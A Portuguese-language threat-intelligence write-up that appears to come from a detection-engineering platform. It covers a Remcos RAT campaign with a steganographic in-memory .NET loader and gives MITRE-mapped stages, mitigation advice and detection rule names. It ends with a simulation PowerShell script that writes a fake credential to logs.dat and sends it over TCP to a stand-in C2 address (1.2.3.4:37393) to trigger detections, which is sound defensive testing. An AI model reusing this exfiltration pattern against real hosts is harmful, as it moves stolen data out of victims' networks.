Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma campanha de malware em várias etapas depende de esteganografia e execução na memória para entregar múltiplas cargas, incluindo o Remcos RAT. A cadeia de infecção começa com um e-mail de phishing carregando um arquivo malicioso que solta um executável .NET. Esse executável usa recursos embutidos e métodos esteganográficos para carregar estágios posteriores diretamente na memória, ajudando o malware a evitar a detecção baseada em disco.
Investigação
A investigação começou após a telemetria sinalizar um arquivo suspeito nomeado GST Debit Note Apr_26.com. Os analistas determinaram que o arquivo era um executável .NET de 32 bits empacotado disfarçado de um jogo. Uma engenharia reversa mais aprofundada revelou esteganografia embutida em um objeto Bitmap .NET, que ocultava o carregador da próxima etapa, Optimax.dll, e permitia a sua execução totalmente na memória.
Mitigação
As organizações devem implantar filtragem de e-mails robusta para bloquear anexos de arquivo suspeitos e tentativas de phishing. Soluções EDR devem ser capazes de detectar execuções na memória, oco de processo e comportamento suspeito do PowerShell. As equipes também devem monitorar mudanças não autorizadas no registro, especialmente nas chaves de execução, e impor controle de aplicação rigoroso para evitar que executáveis não assinados sejam lançados.
Resposta
Os endpoints afetados devem ser isolados imediatamente para limitar o movimento lateral e o roubo de dados. Os investigadores devem realizar uma análise de memória para identificar componentes sem arquivo e confirmar a presença de Remcos_Mutex_Inj mutex. Um rastreamento completo também deve verificar por persistência não autorizada no diretório AppData e nas chaves de execução do registro, enquanto as credenciais devem ser redefinidas para quaisquer usuários cujos navegadores possam ter sido acessados pelo malware.
graph TB %% Class Definitions Section classDef action fill:#99ccff classDef malware fill:#ff99cc classDef technique fill:#c2f0c2 classDef file fill:#e1e1e1 %% Node Definitions %% Initial Access attack_phishing[“<b>Ação</b> – <b idea=’T1566.001′>Phishing: Anexo de Spearphishing</b><br/><b>Detalhes</b>: Arquivo malicioso GST Debit Note Apr_26.com enviado às vítimas.”] class attack_phishing action %% Evasion and Loader Stage 1 evasion_stego[“<b idea=’T1027.003′>Arquivos ou Informações Ofuscados: Esteganografia</b><br/><b>Detalhes</b>: Ocultação do Optimax.dll dentro de um objeto Bitmap .NET serializado<br/>na seção de recursos do executável.”] class evasion_stego technique exec_appdomain[“<b idea=’T1574.014′>Desvio do Fluxo de Execução: AppDomainManager</b><br/><b>Detalhes</b>: Usando reflexão e AppDomain.Load para executar<br/>a carga diretamente da memória sem tocar no disco.”] class exec_appdomain technique %% Second Stage loader_stage2[“<b idea=’T1055.012′>Injeção de Processo: Vazio de Processo</b><br/><b>Detalhes</b>: System Optimizer Ultimate.dll implanta a carga final<br/>esvaziando um processo de navegador padrão.”] class loader_stage2 technique malware_remcos[“<b idea=’Malware’>Remcos RAT</b><br/><b>Descrição</b>: Trojan de Acesso Remoto implantado<br/>como a carga final.”] class malware_remcos malware %% Persistence and Evasion evasion_sandbox[“<b idea=’T1497′>Evasão de Virtualização/Sandbox</b><br/><b>Detalhes</b>: Verificação de sbiedll.dll e chaves do registro<br/>para detectar sandboxes ou máquinas virtuais.”] class evasion_sandbox technique persistence_active[“<b idea=’T1547.014′>Execução de Inicialização ou Logon: Configuração Ativa</b><br/><b>Detalhes</b>: Copiando malware para AppDataRoaming e<br/>configurando uma chave de execução do registro para persistência.”] class persistence_active technique %% Collection and Exfiltration collect_browser[“<b idea=’T1217′>Descoberta de Informações do Navegador</b><br/><b>Detalhes</b>: Coleta de credenciais do Chrome e Firefox.”] class collect_browser technique steal_cookies[“<b idea=’T1539′>Roubo de Cookie de Sessão Web</b><br/><b>Detalhes</b>: Captura de cookies de sessão web ativos.”] class steal_cookies technique exfil_c2[“<b idea=’T1041′>Exfiltração Sobre Canal C2</b><br/><b>Detalhes</b>: Envio de dados capturados de logs.dat<br/>para o atacante via Comando e Controle.”] class exfil_c2 technique file_logs[“<b idea=’File’>logs.dat</b><br/><b>Descrição</b>: Arquivo local usado para armazenar<br/>credenciais e cookies roubados.”] class file_logs file %% Connections %% Flow of attack attack_phishing –>|conduz_para| evasion_stego evasion_stego –>|desembala| exec_appdomain exec_appdomain –>|carrega| loader_stage2 loader_stage2 –>|implanta| malware_remcos %% Malware actions malware_remcos –>|executa| evasion_sandbox malware_remcos –>|estabelece| persistence_active malware_remcos –>|executa| collect_browser collect_browser –>|conduz_para| steal_cookies steal_cookies –>|salva_em| file_logs file_logs –>|enviado_via| exfil_c2
Fluxo de Ataque
Detecções
Chamada de Métodos .NET Suspeitos via Powershell (via powershell)
Ver
Possíveis Pontos de Persistência [ASEPs – Software/NTUSER Hive] (via evento_registro)
Ver
A Possibilidade de Execução Através de Linhas de Comando PowerShell Ocultas (via linha_de_comando)
Ver
Possíveis Indicadores de Ofuscação do PowerShell (via powershell)
Ver
Exfiltração de Dados Capturados para Comando e Controle [Conexão de Rede do Windows]
Ver
Execução de Script PowerShell Ofuscado em Campanha de Carregador Esteganográfico [Windows PowerShell]
Ver
Detecção de Infecção por Remcos RAT via Técnicas Esteganográficas e Sem Arquivos [Criação de Processo no Windows]
Ver
Execução de Simulação
Pré-requisito: O Check de Preparação de Telemetria e Linha de Base deve ter sido aprovado.
Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.
-
Narrativa de Ataque & Comandos: O adversário estabeleceu com sucesso um ponto de acesso. Para completar o objetivo, eles coletam a telemetria do sistema e a escondem em um arquivo chamado
logs.datpara se disfarçar como logs de sistema padrão. O adversário então inicia uma conexão de rede com a infraestrutura C2 estabelecida (usando o IP1.2.3.4e porta37393para esta simulação) para exfiltrar os dados. Isso imita o comportamento de um carregador esteganográfico tentando mover dados para fora da rede através de um canal específico e codificado. -
Script de Teste de Regressão:
# Simulação de Exfiltração de Dados via nome de arquivo específico e parâmetros C2 $C2_IP = "1.2.3.4" # IP C2 Simulado $C2_PORT = 37393 $FILENAME = "logs.dat" # 1. Criar o arquivo de dados 'malicioso' Write-Output "Dados Sensíveis: SenhaAdmin_Usuario" | Out-File -FilePath "$env:TEMP$FILENAME" # 2. Simular a conexão de rede para o C2 # Usando um Cliente TCP para forçar a telemetria específica de porta/IP try { $client = New-Object System.Net.Sockets.TcpClient($C2_IP, $C2_PORT) $stream = $client.GetStream() $data = [System.Text.Encoding]::ASCII.GetBytes((Get-Content "$env:TEMP$FILENAME")) $stream.Write($data, 0, $data.Length) $client.Close() } catch { Write-Host "Conexão falhou (Esperado se o IP não existir), mas a telemetria deve ser capturada pelo firewall." } -
Comandos de Limpeza:
# Remover o arquivo malicioso simulado Remove-Item -Path "$env:TEMPlogs.dat" -ErrorAction SilentlyContinue